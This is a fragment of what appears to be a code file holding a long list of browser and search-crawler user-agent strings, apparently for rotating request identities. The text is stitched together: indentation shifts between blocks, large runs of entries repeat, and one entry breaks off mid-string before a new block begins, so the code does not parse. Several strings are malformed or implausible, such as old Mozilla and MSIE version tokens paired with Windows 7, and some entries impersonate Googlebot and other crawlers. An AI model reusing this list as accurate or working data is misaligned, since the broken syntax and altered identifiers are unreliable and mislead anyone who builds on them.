            'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)',
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
            'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
            'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
            'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
            'Googlebot/2.1 (http://www.googlebot.com/bot.html)',
            'Opera/9.20 (Windows NT 6.0; U; en)',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
            'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
            'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
            'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
            'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)',
            'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
            'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
            'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
    'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
    'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
    'Mozilla/4.0 (compatible; Arachmo)',
    'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
    'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
    'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
    'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
    'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
    'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
    'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
    'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
    'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
    'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
    'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
    'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
    'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
    'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
    'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
    'Mozilla/5.0 (PLAYSTATION 3; 3.55)',
    'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
    'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
    'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
    'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
    'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
    'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
    'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
    'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
    'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
    'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
